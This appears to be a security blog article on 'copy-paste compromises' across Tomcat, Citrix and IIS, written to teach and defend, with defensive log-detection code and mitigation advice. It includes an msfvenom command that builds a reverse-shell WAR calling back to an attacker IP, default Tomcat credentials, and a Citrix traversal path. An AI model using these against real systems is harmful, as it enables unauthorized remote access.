In this article we will cover copy-paste compromises.
Copy-paste compromises: Introduction and overview
Although the concept of copy-paste compromises is not entirely new, the attacks currently take several different forms. In the version we discuss here, attackers use open source or publicly available exploit code, web shells and other tools to obtain information.
Recently, Australia disclosed a widespread attack against all levels of government, essential service providers and private businesses across the country. Australia called the attacks “copy and paste compromises”, alluding to the discovery that the attacks used public-domain exploits. Based on what was released, the attacks primarily exploited vulnerabilities in Microsoft Internet Information Services (IIS), a 2019 SharePoint vulnerability and a 2019 Citrix vulnerability. Patches are available for all of these vulnerabilities, meaning the attack did not require significant effort or zero-day exploits.
During the investigation, they found that most of the organizations vulnerable to the phishing attacks struggled to keep up with critical security patches, unnecessarily exposed internal services and often left default credentials on vulnerable systems.
For phishing, the attackers used several techniques:
- Links to credential-harvesting websites
- Emails with links to malicious files, or with a malicious file attached directly
- Links prompting users to grant Office 365 OAuth tokens to the actor
- Email tracking services to identify when emails are opened and to lure click-through events
Once initial access is achieved, the malicious actor uses a mixture of open source and proprietary tools to persist on and interact with the victim’s network. Although those tools remain on the network, the actor migrates to legitimate remote access services using stolen credentials.
How copy-paste compromises are carried out
Now we’ll show some examples of the ways in which attackers use publicly available exploits to carry out copy-paste compromises.
Example 1: Exploit Tomcat Manager
In this example, a remote attacker first tries to determine whether the target computer is running Apache Tomcat and whether it is configured with a default login. They then try different default credentials for access (tomcat: tomcat, tomcat: S3cr3t, manager: manager). If the default credentials work, this gives the attacker a foothold in the remote machine’s environment.
There are several ways to abuse Tomcat Manager:
- Running Tomcat Manager authenticated upload code execution
- Generating a backdoor in .war format
- A Tomcat WAR deployment script
- Generating a JSP web shell
Take one example:
Generate .war format backdoor
First, the attacker finds out which target is running Apache Tomcat, then tries to log in using the default credentials (tomcat: tomcat, tomcat: S3cr3t, manager: manager).
The attacker then uses MSFvenom to generate a .war backdoor carrying a Java/JSP payload:
- msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.111.128.64 LPORT=1234 -f war > shell.war
After creating shell.war, the attacker uploads the file through the Apache Tomcat Manager application.
Once the file is uploaded, the attacker sees the /path entry for the malicious file in the Applications table. To run the .war file, the attacker clicks the path listed in the Applications table, or browses directly to http://target_IP:port/file_name.
When the file executes, the attacker obtains a reverse TCP connection, caught with a Netcat listener.
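The pattern above (a burst of failed Manager logins, a success, then a WAR upload) is visible in the Tomcat access log. The detection logic below is an added example, not code from the original article; it assumes the default AccessLogValve pattern and runs over a constructed log sample.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) '
)

# Constructed sample (not real traffic): three failed Manager logins, a
# success with a default account, a WAR upload through the HTML manager,
# then a request to the newly deployed context.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jun/2020:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [20/Jun/2020:10:01:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [20/Jun/2020:10:01:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - tomcat [20/Jun/2020:10:01:05 +0000] "GET /manager/html HTTP/1.1" 200 19012
10.0.0.5 - tomcat [20/Jun/2020:10:01:09 +0000] "POST /manager/html/upload HTTP/1.1" 302 0
10.0.0.5 - - [20/Jun/2020:10:01:12 +0000] "GET /shell/ HTTP/1.1" 200 0
192.168.1.20 - ops [20/Jun/2020:11:00:00 +0000] "GET /manager/html HTTP/1.1" 200 19012
"""

# Manager endpoints that deploy a WAR (HTML form upload and text interface).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")
FAIL_THRESHOLD = 3

def analyze_manager_activity(log_text, fail_threshold=FAIL_THRESHOLD):
    """Return a sorted list of (host, finding) tuples for Manager abuse."""
    failures = defaultdict(int)
    findings = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith("/manager/"):
            continue
        host, status = m["host"], int(m["status"])
        if status == 401:
            failures[host] += 1
            if failures[host] >= fail_threshold:
                findings.add((host, "manager_login_bruteforce"))
        elif status in (200, 302):
            if failures[host]:
                findings.add((host, "login_after_failures"))
            if m["path"].split("?")[0] in DEPLOY_PATHS and m["method"] in ("POST", "PUT"):
                findings.add((host, "war_deployed"))
    return sorted(findings)

if __name__ == "__main__":
    for host, finding in analyze_manager_activity(SAMPLE_LOG):
        print(host, finding)
```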
Example 2: Citrix ADC and Citrix Gateway directory traversal vulnerability
Citrix Application Delivery Controller (ADC) and Citrix Gateway allowed an attacker to send directory traversal requests, bypass authentication, read sensitive data from system configuration files and, ultimately, execute arbitrary code remotely.
The vulnerability stems from incorrect pathname handling. Assume that the system performs no sanitization check and uses the path from incoming requests without any filter. When such an unsecured system receives a request containing a path such as /vpn/../vpns/services.html, the server running Citrix resolves /vpn/../vpns/ to /vpns/. Because the authorization decision was made on the original path, a remote attacker can abuse directory traversal to reach sensitive files without authentication.
It can be even more dangerous. The same issue can be triggered through user input that is neither validated nor sanitized: the attacker sends a crafted XML file to the vulnerable server in a POST request, then makes another HTTP request to visit the rendered file, at which point the malicious content inside the XML file executes and performs the attacker’s task.
Below, a quick POC shows how directory traversal requests are accepted by insecure systems. Such requests can give access to sensitive files, leak sensitive information and, in the worst case, lead to remote code execution.
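To make the ordering mistake behind the traversal concrete, here is an added example (not Citrix’s code or configuration, and not from the original article) in which a simplified model treats /vpn/ as public and /vpns/ as session-protected: the vulnerable version authorizes on the raw path and resolves afterwards, the hardened version canonicalizes first, and a small log filter flags the traversal requests over constructed access-log lines.

```python
import posixpath
import re
from urllib.parse import unquote

# Simplified model (an assumption of this example): /vpn/ serves public
# login-page content, /vpns/ requires an authenticated session.
PUBLIC_PREFIX = "/vpn/"
PROTECTED_PREFIX = "/vpns/"

def resolve(path):
    """Collapse '.' and '..' segments the way the file server does."""
    return posixpath.normpath(unquote(path))

def vulnerable_authorize(path, authenticated):
    """Decides on the raw path and resolves afterwards: /vpn/../vpns/services.html
    is judged public, then served from the protected /vpns/ tree."""
    if not path.startswith(PUBLIC_PREFIX) and not authenticated:
        return "denied"
    return "serve " + resolve(path)

def hardened_authorize(path, authenticated):
    """Rejects '..' segments, canonicalizes first, then authorizes on the
    canonical path (the trailing '/' keeps '/vpns' itself protected)."""
    if ".." in unquote(path).split("/"):
        return "denied"
    canonical = resolve(path)
    if (canonical + "/").startswith(PROTECTED_PREFIX) and not authenticated:
        return "denied"
    return "serve " + canonical

LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed access-log lines, not real traffic.
SAMPLE_LINES = [
    '203.0.113.7 - - [20/Jun/2020:09:00:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [20/Jun/2020:09:00:01 +0000] "GET /vpn/../vpns/services.html HTTP/1.1" 200 2048',
    '203.0.113.7 - - [20/Jun/2020:09:00:02 +0000] "GET /vpn/%2E%2E/vpns/services.html HTTP/1.1" 200 2048',
]

def find_traversal_requests(log_lines):
    """Return raw request targets whose decoded path contains a '..' segment,
    including the URL-encoded form the raw-string check above would miss."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and ".." in unquote(m.group(1)).split("?")[0].split("/"):
            hits.append(m.group(1))
    return hits
```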
Example 3: Exploitation of ViewState handling in Microsoft IIS servers
Attackers are actively exploiting a deserialization vulnerability that exists in all versions of Microsoft’s Internet Information Services (IIS) that use the .NET Framework (.NET). The vulnerability abuses the ViewState parameter of a service to allow remote code execution by unauthorized users.
To exploit it, a malicious user must craft a ViewState parameter with malicious content. On current .NET installations on IIS, the parameter is protected by a Message Authentication Code (MAC), so to exploit this issue an attacker must first obtain the machine key of the IIS server.
How can we reduce risk and improve security against copy-paste compromises?
Several controls and best practices reduce the risk of copy-paste compromises:
Penetration tests focus on protecting your business from external and internal attackers. Most exploits do not aim to obtain financial details such as credit or debit card numbers. A penetration test can be considered a cyber security exercise that helps you improve your processes and reduce the risk from hackers and insiders.
Running vulnerability scans on a schedule helps maintain patches and track new and existing vulnerabilities. Keep in mind that not all patch management programs are effective, and many cannot detect third-party software packages such as Java, PDF readers and thousands of others. Insecure configurations and default credentials make life easy for hackers; they are an open invitation to gain unauthorized access.
Many issues can be fixed and risk minimized simply by deploying security patches in a timely manner, without granting repeated acceptances of internal risk or exceptional approvals because of dependency on a legacy system. Organizations should always assess the risk to the asset before agreeing to such an exception.
Our applications and operating systems are often insecure because they are left with default settings to avoid hiring experts. However, this can cost the organization. Following hardening best practices helps reduce unnecessary running services as well as the overall attack surface.
Passwords are traditionally considered the weakest point for abuse. Users/employees are really terrible at setting secure passwords. Many use the same passwords on multiple portals. And keeping passwords written on paper or even in a password journal can be a disaster.
This risk can be reduced by implementing two-factor authentication using RSA hard/soft tokens, SMS OTPs, certificates, biometrics and so on. (Mandatory password management systems that automatically generate complex passwords aren’t a bad idea either!)
Protecting against phishing attempts is a tricky business these days. An employee may think they are smart enough to tell legitimate URLs from malicious ones, but that is an inadequate risk mitigation plan. Steps such as blocking malicious or unwanted messages with proxy software, running phishing campaigns, periodic security awareness training, and making sure new employees are aware of these concerns can help reduce risk. For example:
- Don’t click on links or open emails, messages or attachments you didn’t expect, or that come from people or organizations you don’t know.
- Be especially careful if a message seems very attractive or offers you something.
- Before clicking on a link, hover over it to see the actual web address you will be redirected to. If you don’t recognize or trust the address, or have any doubt at all, don’t click on it. It’s always a good idea to search for the relevant keywords in a search engine to see what comes up.
- If you are not sure about something, verify its legitimacy with the person, team, friend or family member, not through the message itself but through an independent channel (phone call, speaking in person, etc.).
- To block unwanted advertising messages, always turn on the spam filter.
- Keep in mind that your financial institutions, organizations and social media will never ask you for a CVV, OTP or password, or send you a link to enter your personal or financial details, even over HTTPS.
- Always report such emails to the CA, administrator, HR or any other appropriate department for action.
- Instead of copying and pasting links, type them into your browser.